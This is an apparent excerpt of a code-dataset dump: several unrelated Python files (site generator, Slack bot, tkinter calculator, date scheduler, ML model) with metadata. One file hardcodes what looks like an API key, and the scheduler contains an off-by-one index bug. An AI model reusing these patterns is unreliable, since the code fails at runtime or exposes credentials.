stream.read()\n\n @classmethod\n def recipe(this, name, recipes):\n\n \"\"\"Return the recipe with a pattern that matches the specified name.\n \"\"\"\n\n for pattern in recipes:\n if re.search(pattern, name):\n return Recipe(recipes[pattern])\n\n def render(self):\n\n self.scan()\n\n for name, resource in self.__resources.items():\n\n if hasattr(resource, 'content'):\n content = resource.content\n\n if content is None:\n continue\n\n recipe = self.recipe(name, self.transforms)\n\n if recipe:\n content = recipe.prepare(content, resource)\n\n if hasattr(resource, 'suffix'):\n name, suffix = os.path.splitext(name)\n name = name + resource.suffix\n\n if hasattr(self, 'base'):\n resource.url = self.base + name\n\n target = os.path.join(self.target, name)\n\n if hasattr(resource, 'draft') and resource.draft:\n target, suffix = os.path.splitext(target)\n target = target + self.draft_suffix + suffix\n\n self.writeTextFile(target, content)\n\n if self.sitemap:\n self.writeSitemap(os.path.join(self.target, self.sitemap))\n\n def resource(self, name):\n if name in self.__resources:\n return self.__resources[name]\n\n def scan(self, refresh=False):\n\n if refresh:\n self.__resources = []\n\n for path, _, filenames in os.walk(self.source):\n for filename in filenames:\n\n recipe = self.recipe(filename, self.filters)\n\n if recipe:\n self._scan(path, filename, recipe)\n\n for resource in self.__resources.values():\n resource.meta(xref=self.index(resource))\n\n def writeSitemap(self, name):\n\n xmlns = 'http://www.sitemaps.org/schemas/sitemap/0.9'\n ElementTree.register_namespace('', xmlns)\n urlset = ElementTree.Element('{' + xmlns + '}urlset')\n\n for resource in self.__resources.values():\n\n url = ElementTree.SubElement(urlset, 'url')\n loc = ElementTree.SubElement(url, 'loc')\n loc.text = resource.url\n lastmod = ElementTree.SubElement(url, 'lastmod')\n lastmod.text = resource.modified.isoformat()\n\n if hasattr(resource, 'changefreq'):\n changefreq = ElementTree.SubElement(url, 'changefreq')\n changefreq.text = resource.changefreq\n\n if hasattr(resource, 'priority'):\n priority = ElementTree.SubElement(url, 'priority')\n priority.text = resource.priority\n\n self.writeTextFile(name, '' + ElementTree.tostring(urlset))\n\n @classmethod\n def writeTextFile(this, name, content):\n\n \"\"\"Write content to UTF-8 text file, creating directories as needed.\n \"\"\"\n\n dirname = os.path.dirname(name)\n\n if dirname and not os.path.isdir(dirname):\n os.makedirs(dirname)\n\n with codecs.open(name, 'w', encoding='utf-8') as stream:\n stream.write(content)\n\n def _scan(self, path, filename, recipe):\n\n source = os.path.join(path, filename)\n modified = os.path.getmtime(source)\n modified = datetime.fromtimestamp(modified, tzlocal())\n title, suffix = os.path.splitext(filename)\n name = os.path.join(path, slugify(title) + suffix)\n name = os.path.relpath(name, self.source)\n resource = self.resource(name)\n\n if not resource or resource.modified != modified:\n\n resource = Resource(\n modified=modified,\n pubdate=datetime.combine(modified, time(0, 0)),\n site=self,\n source=source,\n suffix=suffix,\n title=title,\n )\n\n content = self.readTextFile(source)\n resource.content = recipe.prepare(content, resource)\n self.__resources[name] = resource\n\n\n# enable parsing of timestamps\nyaml.add_constructor(\n u'tag:yaml.org,2002:timestamp',\n lambda _, node: dateutil.parser.parse(node.value)\n)\n\nif __name__ == '__main__':\n Site.load(os.getcwd()).render()\n","sub_path":"gild/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":7352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"127413626","text":"\"\"\" Contains the Snippet class and methods for handling snippets.\n\nAttributes:\n SNIPPET_PREFIX: string prefix for snippets.\n\"\"\"\n\nSNIPPET_PREFIX = \"SNIPPET_\"\n\n\ndef is_snippet(token):\n \"\"\" Determines whether a token is a snippet or not.\n\n Inputs:\n token (str): The token to check.\n\n Returns:\n bool, indicating whether it's a snippet.\n \"\"\"\n return token.startswith(SNIPPET_PREFIX)\n\ndef expand_snippets(sequence, snippets):\n \"\"\" Given a sequence and a list of snippets, expand the snippets in the sequence.\n\n Inputs:\n sequence (list of str): Query containing snippet references.\n snippets (list of Snippet): List of available snippets.\n\n return list of str representing the expanded sequence\n \"\"\"\n snippet_id_to_snippet = {}\n for snippet in snippets:\n assert snippet.name not in snippet_id_to_snippet\n snippet_id_to_snippet[snippet.name] = snippet\n expanded_seq = []\n for token in sequence:\n if token in snippet_id_to_snippet:\n expanded_seq.extend(snippet_id_to_snippet[token].sequence)\n else:\n assert not is_snippet(token)\n expanded_seq.append(token)\n\n return expanded_seq\n\ndef snippet_index(token):\n \"\"\" Returns the index of a snippet.\n\n Inputs:\n token (str): The snippet to check.\n\n Returns:\n integer, the index of the snippet.\n \"\"\"\n assert is_snippet(token)\n return int(token.split(\"_\")[-1])\n\n\nclass Snippet():\n \"\"\" Contains a snippet. \"\"\"\n def __init__(self,\n sequence,\n startpos,\n sql,\n age=0):\n self.sequence = sequence\n self.startpos = startpos\n self.sql = sql\n\n # TODO: age vs. index?\n self.age = age\n self.index = 0\n\n self.name = \"\"\n self.embedding = None\n\n self.endpos = self.startpos + len(self.sequence)\n assert self.endpos < len(self.sql), \"End position of snippet is \" + str(\n self.endpos) + \" which is greater than length of SQL (\" + str(len(self.sql)) + \")\"\n assert self.sequence == self.sql[self.startpos:self.endpos], \\\n \"Value of snippet (\" + \" \".join(self.sequence) + \") \" \\\n \"is not the same as SQL at the same positions (\" \\\n + \" \".join(self.sql[self.startpos:self.endpos]) + \")\"\n\n def __str__(self):\n return self.name + \"\\t\" + \\\n str(self.age) + \"\\t\" + \" \".join(self.sequence)\n\n def __len__(self):\n return len(self.sequence)\n\n def increase_age(self):\n \"\"\" Ages a snippet by one. \"\"\"\n self.index += 1\n\n def assign_id(self, number):\n \"\"\" Assigns the name of the snippet to be the prefix + the number. \"\"\"\n self.name = SNIPPET_PREFIX + str(number)\n\n def set_embedding(self, embedding):\n \"\"\" Sets the embedding of the snippet.\n\n Inputs:\n embedding (dy.Expression)\n\n \"\"\"\n self.embedding = embedding\n","sub_path":"data_util/snippets.py","file_name":"snippets.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"120510189","text":"##############################################################\r\n##File Name: Dog Age Calculator ##\r\n##File Type: Python 3 ##\r\n## ##\r\n##Author: Joseph Brown ##\r\n##Project Type: Independent Project ##\r\n##Creation Date: 28 May 2021 ##\r\n##Last Modification Date: ##\r\n## ##\r\n##Description: ##\r\n##A Calculator made for helping create a Dog's Age ##\r\n## ##\r\n##Version: 2.0 ##\r\n## ##\r\n##Version History: ##\r\n## 2.0 - Changed to a Basic Graphical Interface ##\r\n##1.2 - Made the Program More User Friendly ##\r\n##1.11 - Tidied Up Sleeps and Added More to the Results ##\r\n##1.1 - Added Use of Sleep to Make Program Last for Longer ##\r\n##1.0 - Basic Calculations of the Age using Input Variables ## \r\n##############################################################\r\n\r\n#Imports\r\nimport tkinter\r\nimport os\r\nfrom tkinter.constants import BOTTOM\r\n\r\n##Version 2 Code##\r\n\r\n#Application\r\nname_window = tkinter.Tk()\r\nname_window.title(\"Dog Calculator\")\r\nname_window.geometry(\"400x350\")\r\nname_window.columnconfigure(0, weight=1)\r\nname_window.columnconfigure(1, weight=1)\r\nname_window.columnconfigure(2, weight=1)\r\n\r\n#Variables\r\nname_var = tkinter.StringVar()\r\nage_var = tkinter.StringVar()\r\n\r\n#Functions\r\ndef donothing():\r\n filewin = tkinter.Toplevel()\r\n button = tkinter.Button(filewin, text=\"Do Nothing Button\")\r\n button.pack()\r\n\r\ndef program_info():\r\n sysinfo = tkinter.Toplevel()\r\n sysinfo.title(\"Dog Calculator - Program Info\")\r\n sysinfo.geometry(\"400x100\")\r\n info_name = tkinter.Label(sysinfo, text=\"Dog Calculator\")\r\n info_name.pack()\r\n info_ver = tkinter.Label(sysinfo, text=\"Version 2.0\")\r\n info_ver.pack()\r\n info_auth = tkinter.Label(sysinfo, text=\"By Joseph Brown\")\r\n info_auth.pack()\r\n info_exit = tkinter.Button(sysinfo, text=\"Close\", command=sysinfo.destroy)\r\n info_exit.pack()\r\n\r\ndef name_submit():\r\n dog_name = name_var.get()\r\n name_var.set(\"\")\r\n print(dog_name)\r\n\r\ndef age_submit():\r\n age = age_var.get()\r\n age_var.set(\"\")\r\n print(age)\r\n\r\n#Application Menu\r\nmenubar = tkinter.Menu()\r\nfilemenu = tkinter.Menu(menubar, tearoff=0)\r\nfilemenu.add_command(label=\"Restart\", command=donothing)\r\n\r\nfilemenu.add_separator()\r\n\r\nfilemenu.add_command(label=\"Exit\", command=quit)\r\nmenubar.add_cascade(label=\"File\", menu=filemenu)\r\n\r\nhelpmenu = tkinter.Menu(menubar, tearoff=0)\r\nhelpmenu.add_command(label=\"Options\", command=donothing)\r\nhelpmenu.add_command(label=\"Program Help\", command=donothing)\r\n\r\nhelpmenu.add_separator()\r\n\r\nhelpmenu.add_command(label=\"Program Info\", command=program_info)\r\nmenubar.add_cascade(label=\"Help\", menu=helpmenu)\r\n\r\n#Application Workings\r\ndog_name_entry = tkinter.Label(text=\"What is Your Dog's Name? \")\r\ndog_name_entry2 = tkinter.Entry(textvariable=name_var)\r\ndog_name_entry_button = tkinter.Button(text=\"Submit\", width=10, height=2, background=\"White\", command=name_submit)\r\n\r\nage_entry = tkinter.Label(text=\"What is Your Dog's Age in Human Years? \")\r\nage_entry2 = tkinter.Entry(textvariable=age_var)\r\nage_entry_button = tkinter.Button(text=\"Submit\", width=10, height=2, background=\"White\", command=age_submit)\r\n\r\nresult = tkinter.Label(text = \"Your Dog: \")\r\nresult_name = tkinter.Label(text=\"DogName\")\r\nresult2 = tkinter.Label(text = \"Is: \")\r\nresult2_name = tkinter.Label(text=\"Age\")\r\nresult3 = tkinter.Label(text=\"That's: \")\r\nresult3_age = tkinter.Label(text=\"DogAge\")\r\nresult3_final = tkinter.Label(text=\" In Dog Years!\")\r\n\r\ndog_name_entry.grid(column=1, row=0)\r\ndog_name_entry2.grid(column=1, row=1)\r\ndog_name_entry_button.grid(column=1, row=2)\r\n\r\nspace1 = tkinter.Label(text=\" \")\r\nspace1.grid(column=1, row=3)\r\nspace2 = tkinter.Label(text=\" \")\r\nspace2.grid(column=1, row=4)\r\n\r\nage_entry.grid(column=1, row=5)\r\nage_entry2.grid(column=1, row=6)\r\nage_entry_button.grid(column=1, row=7)\r\n\r\nspace = tkinter.Label(text=\" \")\r\nspace.grid(column=1, row=8)\r\nspace1 = tkinter.Label(text=\" \")\r\nspace1.grid(column=1, row=9)\r\n\r\nresult.grid(column=0, row=10)\r\nresult_name.grid(column=0, row=11)\r\nresult2.grid(column=1, row=10)\r\nresult2_name.grid(column=1, row=11)\r\nresult3.grid(column=2, row=10)\r\nresult3_age.grid(column=2, row=11)\r\nresult3_final.grid(column=2, row=12)\r\n\r\n#Packing Overall Application\r\nname_window.config(menu=menubar)\r\nname_window.mainloop()\r\n\r\n","sub_path":"Dog Calculator V2.py","file_name":"Dog Calculator V2.py","file_ext":"py","file_size_in_byte":4819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"192725149","text":"#Two Sum\n#思路1:暴力[5804ms]\n#思路2:哈希[2968ms]\n#思路3:排序夹逼\nclass Solution(object):\n def twoSum(self, nums, target):\n result = []\n for i in range(len(nums)):\n for j in range(i+1, len(nums)):\n if nums[i] + nums[j] == target:\n result.append(i)\n result.append(j)\n return result\n\nclass Solution(object):\n def twoSum(self, nums, target):\n result = []\n hashtable = {}\n for i in range(len(nums)):\n hashtable[str(nums[i])] = i\n \n for j in range(len(nums)):\n tmp = str(target - nums[j])\n if tmp in hashtable.keys() and hashtable[tmp] != j:\n result.append(j)\n result.append(hashtable[tmp])\n return sorted(result)","sub_path":"src/twoSum.py","file_name":"twoSum.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"287579080","text":"import datetime\nimport os\nimport shutil\nimport time\n\nfrom base.driver_context import DriverContext\n\n\nclass Utilities:\n path = os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\"))\n SCREENSHOTS_LOC = path + '/screen_shots'\n\n @staticmethod\n def convert_blank_data_value(data):\n if data.lower() == 'blank':\n data = ''\n elif '' in data:\n data = data.replace('', ' ')\n return data\n\n @staticmethod\n def get_values_as_a_list(values):\n return values.split(',')\n\n @staticmethod\n def get_question_code_element(survey, question_code):\n if survey == '023':\n question_code = question_code.replace(\"Q\", \"\")\n else:\n question_code = question_code.replace(\"Q\", \"\").zfill(4)\n return question_code\n\n @staticmethod\n def remove_multiple_spaces_in_a_string(value):\n return \" \".join(value.split())\n\n @staticmethod\n def take_screen_shot(*scenario_details):\n scenario = scenario_details[0]\n\n if scenario.status.name == 'failed':\n Utilities.create_screen_shots_folder()\n scenario_with_line_no = scenario.feature.scenarios[0].name + '_line_no_' + str(scenario.line)\n\n scenario_file_path = os.path.join(Utilities.SCREENSHOTS_LOC,\n scenario_with_line_no\n + '_' + time.strftime(\"%H%M%S_%d_%m_%Y\")\n + '.png')\n print(\"take the screenshot! \" + scenario_file_path)\n DriverContext.driver.save_screenshot(scenario_file_path)\n\n @staticmethod\n def delete_screenshots_folder():\n if os.path.isdir(Utilities.SCREENSHOTS_LOC):\n shutil.rmtree(Utilities.SCREENSHOTS_LOC)\n print(\"removed the screenshots folder!\")\n\n @staticmethod\n def create_screen_shots_folder():\n if not os.path.exists(Utilities.SCREENSHOTS_LOC):\n print('create new folder')\n os.makedirs(Utilities.SCREENSHOTS_LOC)\n\n @staticmethod\n def date_converter(year, month, day):\n return datetime.date(year, month, day)\n","sub_path":"tests/acceptance-tests/base/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"505635935","text":"import tensorflow as tf\nfrom transformers import TFBertForSequenceClassification, TFBertModel\n\n\nclass CZERT(tf.keras.Model):\n\n def __init__(self, model_dir, num_labels):\n super(CZERT, self).__init__()\n self.encoder = TFBertModel.from_pretrained(model_dir)\n self.cls_layer = tf.keras.layers.Dense(num_labels)\n\n def __call__(self, example, *args, **kwargs):\n output = self.encoder(example['input_ids'])\n # cls_tokens = output['last_hidden_state'][:, 0, :]\n cls_tokens = output['pooler_output']\n x = self.cls_layer(cls_tokens)\n return x\n","sub_path":"czert.py","file_name":"czert.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"417190153","text":"from __future__ import print_function\nfrom __future__ import unicode_literals\n# don't convert to ascii in py2.7 when creating string to return\n\nimport os\nimport json\nimport gevent\nfrom crunchable import Crunchable\nfrom braceexpand import expand_braces\nimport logging\nfrom threading import Lock\nfrom contextlib import contextmanager\nimport datetime\nlock = Lock()\n\n\noutputs = []\ncrontabs = []\nuser_name = None\nuser_id = None\n\nFILE = \"plugins/tasks.json\"\n\ndef get_state_file():\n global config\n return config.get('CRUNCHABLE_STATE', 'plugins/state.json')\n\n@contextmanager\ndef get_state():\n filename = get_state_file()\n with lock:\n try:\n state = json.loads(open(filename, 'rb').read())\n except IOError:\n state = {}\n if 'pending' not in state:\n state['pending'] = {}\n yield state\n open(filename, 'wb').write(json.dumps(state))\n\ndef store_pending(id, channel, user, identifier):\n with get_state() as state:\n state['pending'][id] = [channel, user, identifier]\n\ndef pop_pending(id):\n with get_state() as state:\n try:\n state['pending'].pop(id)\n except KeyError:\n logging.warn('tried to pop missing id: {}'.format(id))\n\ndef read_state():\n with get_state() as state:\n return state\n\ndef respond(channel, text):\n global outputs\n outputs.append([channel, text])\n\ndef send_file(channel, content, filetype, filename):\n global outputs\n outputs.append([channel, 'FILE', content, filetype, filename])\n\ndef respond_to_user(channel, user, text):\n if channel.startswith('D'): #private chat\n respond(channel, text)\n else:\n respond(channel, '<@{}>: '.format(user) + text)\n\ndef dm_to_user(channel, user, text):\n if channel.startswith('D'): #private chat\n respond(channel, text)\n else:\n outputs.append([channel, 'DM', user, text])\n\ndef head(text):\n try:\n first, rest = text.split(None, 1)\n return first, rest\n except ValueError:\n return text, None\n\ndef get_tasks():\n return json.loads(open(FILE, 'rb').read())\ndef save_tasks(tasks):\n with open(FILE, 'wb') as f:\n f.write(json.dumps(tasks, indent=2))\nif not os.path.isfile(FILE):\n save_tasks({})\ndef add_new_task(identifier, task):\n tasks = get_tasks()\n tasks[identifier] = task\n save_tasks(tasks)\n\ndef get_crunchable_client():\n global config\n token = config['CRUNCHABLE_TOKEN']\n client = Crunchable(token)\n return client\n\ndef send_task(task, attachments):\n client = get_crunchable_client()\n request = client.request_free_text(attachments=attachments, **task)\n response = client.wait_for_task(request['id'])\n return response['response']\n\ndef wait_for_task(channel, user, client, task_id, identifier):\n response = client.wait_for_task(task_id)\n if response['status'] == 'complete':\n answer = response.get('response', '')\n else:\n answer = response.get('cruncher_feedback')\n respond_to_user(channel, user, \"Here's your response (you asked: {} {})\".format(identifier, response['attachments'][0]))\n respond(channel, \"{}\".format(answer))\n pop_pending(task_id)\n return (identifier, response['attachments'][0], answer)\n\ndef send_tasks(channel, user, identifier, task, attachments):\n client = get_crunchable_client()\n requests = [client.request_free_text(attachments=[att], **task) for att in attachments]\n [store_pending(req['id'], channel, user, identifier) for req in requests]\n asyncs = [gevent.spawn(wait_for_task, channel, user, client, req['id'], identifier) for req in requests]\n if len(asyncs) > 1:\n responses = gevent.joinall(asyncs)\n lines = [','.join(response.value) for response in responses]\n content = '\\n'.join(lines)\n respond_to_user(channel, user, 'And to summarize:')\n send_file(channel, content, 'csv', 'crunchable-responses-{}.csv'.format(datetime.datetime.now().isoformat()))\n\ndef recover_state():\n state = read_state()\n pending = state.get('pending', {})\n client = get_crunchable_client()\n for (id, [channel, user, identifier]) in pending.iteritems():\n gevent.spawn(wait_for_task, channel, user, client, id, identifier)\n\ndef setup():\n recover_state()\n\nSOMETHING_ELSE = 'Nothing fits'\nNOT_A_REQUEST = 'Irrelevant/Nonsense'\n\nRECOGNIZE_TASK = dict(\n instruction=\"We are building a knowledge-base on how to execute various internet searches.\\nHelp us match between the **request** quoted below and a list of relevant search instructions listed in the choices.\\n\\nChoose the one that you think fits the request.\\nChoose **'{}'** if none of them match.\\nChoose **'{}'** if the attached request does not look like a question at all (or if it's just some non-sense)\\n\\n**There is no need to perform any task! only choose the most relevant one!**\".format(SOMETHING_ELSE, NOT_A_REQUEST),\n min_answers = 1,\n max_answers = 1,\n choices_type='text',\n# tags = ['role.crunch_qa'],\n)\n\ndef crunchable_recognize_task(text):\n client = get_crunchable_client()\n tasks = get_tasks()\n attachments = ['**Request:** {}'.format(text)] # + ['{}: {}'.format(identifier, task['instruction']) for (identifier, task) in sorted(tasks.iteritems())]\n # choices = sorted(tasks.keys()) + [SOMETHING_ELSE, NOT_A_REQUEST]\n choices = ['{}: {}'.format(identifier, task['instruction']) for (identifier, task) in sorted(tasks.iteritems())] + [SOMETHING_ELSE, NOT_A_REQUEST]\n request = client.request_multiple_choice(choices=choices, attachments=attachments, **RECOGNIZE_TASK)\n response = client.wait_for_task(request['id'])\n [choice] = response['response']\n return choice\n\nAUTOLEARN_TASK = dict(\n instruction=\"Look at the **request** below, and help us write a good instruction on how to perform similar tasks.\\nAlso, please give a name to these types of instructions. \\n See below a list of examples of similar tasks. \\n \\n **If you are unable to write a good instruction, just leave the response fields blank**\",\n responseTitles=[\"identifier\",\"instruction\"],\n tags=['role.crunch_qa'],\n)\n\ndef crunchable_autolearn_task(channel, user, text):\n client = get_crunchable_client()\n tasks = get_tasks()\n attachments = ['**Request:** ' + text] + [\"**Example:**\\nIdentifier: {}\\nInstruction: {}\".format(identifier, task['instruction']) for (identifier, task) in sorted(tasks.iteritems())]\n request = client.request_free_text(attachments=attachments, **AUTOLEARN_TASK)\n response = client.wait_for_task(request['id'])['response']\n identifier = response['identifier'].strip()\n instruction = response['instruction'].strip()\n if (not identifier) or (not instruction):\n return\n task = {'instruction': instruction}\n add_new_task(identifier, task)\n dm_to_user(channel, user, \"I learned something new today!\")\n dm_to_user(channel, user, \"@crunchable-bot {} --- {}\".format(identifier, instruction))\n trigger_known_instruction(channel, user, task, text, identifier)\n\ndef learn_new_instruction(channel, text, override=False):\n identifier, instruction = head(text)\n if not override:\n tasks = get_tasks()\n if identifier in tasks:\n respond(channel, \"I already know how to do this! if you want to override - try '@crunchable-bot: reteach ...'\")\n return\n \n task = {'instruction': instruction}\n add_new_task(identifier, task)\n respond(channel, 'Thanks! now I know how to do that!')\n\ndef handle_unrecognized_commmand(channel, user, text):\n respond(channel, \"TYPING\")\n respond_to_user(channel, user, \"I'm on it!\")\n task_identifier = crunchable_recognize_task(text)\n if task_identifier == NOT_A_REQUEST:\n return respond_to_user(channel, user, \"Sorry, I didn't understand you\")\n if task_identifier == SOMETHING_ELSE:\n gevent.spawn(crunchable_autolearn_task, channel, user, text)\n respond_to_user(channel, user, \"OK, let me see if I can figure it out (you can also help me by teaching me how to do it)\")\n show_teach_instruction(channel)\n return\n tasks = get_tasks()\n identifier = task_identifier.split(':')[0]\n task = tasks[identifier]\n trigger_known_instruction(channel, user, task, text, identifier)\n\ndef trigger_known_instruction(channel, user, task, text, identifier):\n respond_to_user(channel, user, \"Please wait while I look for someone to answer you...\")\n send_tasks(channel, user, identifier, task, attachments=expand_braces(text))\n\ndef trigger_internal_fetch(channel, user, text, slack_client):\n users_to_fetch = text.split()\n respond_to_user(channel, user, \"Sure, I'll fetch him for you! hang tight!\")\n client = get_crunchable_client()\n\n username = slack_client.api_call('users.info', user=user)['user']['name']\n for user in users_to_fetch:\n client.request_multiple_choice(instruction=\"Please contact {} on Slack. Thanks!\".format(username), choices=[\"Sure!\", \"OK!\"], min_answers=1, max_answers=1, choices_type=\"text\", tags=[user], priority=10)\n\ndef show_help_messsage(channel, tasks):\n respond(channel, \"Here's what I already know how to do:\")\n for identifier, task in tasks.iteritems():\n respond(channel, \"{} - {}\".format(identifier, task['instruction']))\n respond(channel, \"But you can easily teach me new stuff! simply use:\")\n show_teach_instruction(channel)\n\ndef show_teach_instruction(channel):\n respond(channel, \"@crunchable-bot: teach ''\")\n respond(channel, \"For example: @crunchable-bot: teach gettimezone 'Search google for the timezone of the given city'\") \n\ndef process_message(data):\n channel = data[\"channel\"]\n logging.info('crunchable sees {}'.format(data))\n if 'text' not in data:\n logging.warn('got data with no text {}'.format(data))\n return\n text = data[\"text\"]\n if 'user' not in data:\n logging.warn('got data with no user {}'.format(data))\n return\n user = data['user']\n if user == user_id:\n # ignore what I say...\n return\n possible_names = {'crunchable', '<@{}>:'.format(user_id), '<@{}>'.format(user_id), user_name}\n if channel.startswith('D'):\n # private chat\n try:\n myname, moretext = head(text)\n if myname not in possible_names:\n moretext = text \n except ValueError:\n moretext = text\n else:\n try:\n myname, moretext = head(text)\n if myname not in possible_names:\n return\n except ValueError:\n return\n try:\n if moretext.lower().replace('!','').strip() in ['hi', 'hello']:\n return respond(channel, \"Hello there!\")\n if moretext.lower().replace('!', '').replace('?','') == \"are you ready\":\n return respond(channel, \"I was born ready!\")\n if moretext.lower().replace('!', '').replace('?','') == \"ping\":\n return dm_to_user(channel, user, \"Pong!\")\n identifier, rest = head(moretext)\n lidentifier = identifier.lower()\n if lidentifier == 'teach':\n return learn_new_instruction(channel, rest)\n if lidentifier == 'reteach':\n return learn_new_instruction(channel, rest, override=True)\n tasks = get_tasks()\n if lidentifier == 'help':\n return show_help_messsage(channel, tasks)\n if any(lidentifier.startswith(x) for x in ['thank', '10x']):\n respond(channel, \"You're welcome, <@{}>!\".format(user))\n return\n if lidentifier == 'fetch':\n if config.get('internal', False):\n return gevent.spawn(trigger_internal_fetch, channel, user, rest, data['__slack_client'])\n else:\n return respond_to_user(channel, user, \"I'm not sure what you want me to do...\")\n lowercase_to_originalcase = {task_id.lower(): task_id for task_id in tasks}\n if lidentifier in lowercase_to_originalcase:\n identifier = lowercase_to_originalcase[lidentifier]\n if identifier in tasks:\n logging.info(\"{} recognized as task\".format(identifier))\n return gevent.spawn(trigger_known_instruction, channel, user, tasks[identifier], rest, identifier)\n # unknown command, use crunchable to understand what the user wants\n logging.info(\"unrecognized identifier {}\".format(moretext))\n gevent.spawn(handle_unrecognized_commmand, channel, user, moretext)\n except ValueError:\n return respond(channel, \"Sorry, I'm not feeling so well... can you send someone to check in on me, please?\")\n\n\ndef process_user_info(data):\n global user_name\n global user_id\n if 'user' in data:\n user_name = data['user']\n if 'user_id' in data:\n user_id = data['user_id']\n\ndef catch_all(data):\n return # disabled for now\n global config\n print(config)\n print(\"[ALL]\", data)\n","sub_path":"plugins/crunchablebot.py","file_name":"crunchablebot.py","file_ext":"py","file_size_in_byte":12903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"609686684","text":"import numpy as np\nimport streamlit as st\nimport base64\nfrom GimmeSomeJazz import GimmeSomeJazz\nfrom GimmeSomeJazzGifs import GimmeSomeJazzGifs\n\n\nDATASET = 'dataset/library.json'\n\n\nst.set_page_config(\n layout=\"wide\",\n initial_sidebar_state=\"auto\",\n page_title=\"🎙️Gimme Somme Jazz!\",\n page_icon=\"🎙️\"\n)\nleft_column, right_column = st.beta_columns(2)\nleft_column.write(\"# I'm your jazz coach\")\nleft_column.write(\"Feeding you with the best of jazz\")\nbutton = left_column.button(\"Gimme some jazz!\", \"new\")\n\ngifer = GimmeSomeJazzGifs(\"LIVDSRZULELA\")\ntrainer = GimmeSomeJazz(DATASET)\n\nif button:\n desc = trainer.draw()\n gif = gifer.draw()\n left_column.write(desc, unsafe_allow_html=True)\n right_column.image(gif, width=400, use_column_width='always')\n right_column.write(\"[link to TenorGif](%s)\" % gif)\n","sub_path":"gsj-app.py","file_name":"gsj-app.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"548196446","text":"from operator import add, sub\r\n\r\nfrom schedule.calendar import Calnedar\r\nfrom schedule.days import Days\r\nfrom schedule.weeks import Weeks\r\nfrom schedule.months import Months\r\nfrom schedule.years import Years\r\n\r\n\r\nclass DayConvention:\r\n __period_dictionary = {\"D\": Days, \"W\": Weeks, \"M\": Months, \"Y\": Years}\r\n\r\n def __init__(self, value_date, calendar):\r\n self.__calendar = calendar\r\n self.__value_date = value_date\r\n\r\n def convert_tenor_to_date(self, tenor, start_date = None):\r\n if start_date is None:\r\n start_date = self.__value_date\r\n\r\n expiry_date = start_date\r\n if tenor in [\"ON\", \"TN\"]:\r\n n_day = 1 if tenor == \"ON\" else 2\r\n while (n_day > 0):\r\n expiry_date = expiry_date + Days(1)\r\n if self.is_businessday(expiry_date):\r\n n_day -= 1\r\n else:\r\n base = tenor[len(tenor)]\r\n num = int(tenor[:len(tenor)])\r\n period = self.__period_dictionary[base](num)\r\n expiry_date = expiry_date + period\r\n \r\n if self.is_holiday(expiry_date):\r\n emo = self.__calendar.last_business_day_of_month(expiry_date.year, expiry_date.month)\r\n op = sub if (base in [\"M\", \"Y\"]) and (expiry_date > emo) else add\r\n\r\n while self.is_holiday(expiry_date):\r\n expiry_date = op(expiry_date, Days(1))\r\n\r\n return expiry_date\r\n\r\n def is_businessday(self, date):\r\n return not self.__calendar.is_holiday(date)\r\n\r\n def is_holiday(self, date):\r\n return self.__calendar.is_holiday(date)\r\n\r\n def date_sequence(self, end, by, begin = None):\r\n if begin is None:\r\n begin = self.__value_date\r\n next_date = begin\r\n seq = []\r\n num = int(by[:len(by)])\r\n add_num = num\r\n base = by[len(by)]\r\n\r\n while (next_date <= end):\r\n seq.append(next_date)\r\n next_date = self.convert_tenor_to_date(str(num) + base, begin)\r\n num += add_num\r\n\r\n return seq\r\n","sub_path":"schedule/dayconvention.py","file_name":"dayconvention.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"179320512","text":"\"\"\"\nReleaseAllResources command class for SdpSubarrayLeafNode.\n\"\"\"\nimport threading\nimport time\nfrom logging import Logger\nfrom typing import Callable, Optional, Tuple\n\nfrom ska_control_model.task_status import TaskStatus\nfrom ska_tango_base.commands import ResultCode\nfrom ska_tango_base.control_model import ObsState\nfrom ska_tmc_common.timeout_callback import TimeoutCallback\nfrom tango import DevFailed\n\nfrom ska_tmc_sdpsubarrayleafnode.commands.abstract_command import SdpSLNCommand\n\n\nclass ReleaseAllResources(SdpSLNCommand):\n \"\"\"\n A class for SdpSubarayLeafNode's ReleaseAllResources() command.\n\n Releases all the resources of given SDP Subarray Leaf Node.\n It accepts the subarray id, releaseALL flag and receptorIDList in\n JSON string format.\n \"\"\"\n\n def __init__(self, component_manager, logger=None) -> None:\n super().__init__(component_manager, logger)\n self.timeout_id = f\"{time.time()}_{__class__.__name__}\"\n self.timeout_callback = TimeoutCallback(self.timeout_id, self.logger)\n self.task_callback: Callable\n\n def release_resources(\n self,\n logger: Logger,\n task_callback: Callable = None,\n # pylint: disable=unused-argument\n task_abort_event: Optional[threading.Event] = None,\n ) -> None:\n \"\"\"This is a long running method for ReleaseAllResources command, it\n executes do hook, invokes ReleaseAllResources command on SdpSubarray.\n\n :param logger: logger\n :type logger: logging.Logger\n :param task_callback: Update task state, defaults to None\n :type task_callback: Callable, optional\n :param task_abort_event: Check for abort, defaults to None\n :type task_abort_event: Event, optional\n \"\"\"\n self.component_manager.command_in_progress = \"ReleaseAllResources\"\n self.task_callback = task_callback\n task_callback(status=TaskStatus.IN_PROGRESS)\n self.component_manager.start_timer(\n self.timeout_id,\n self.component_manager.command_timeout,\n self.timeout_callback,\n )\n result_code, message = self.do()\n if result_code == ResultCode.FAILED:\n self.update_task_status(result_code, message)\n self.component_manager.stop_timer()\n else:\n lrcr_callback = 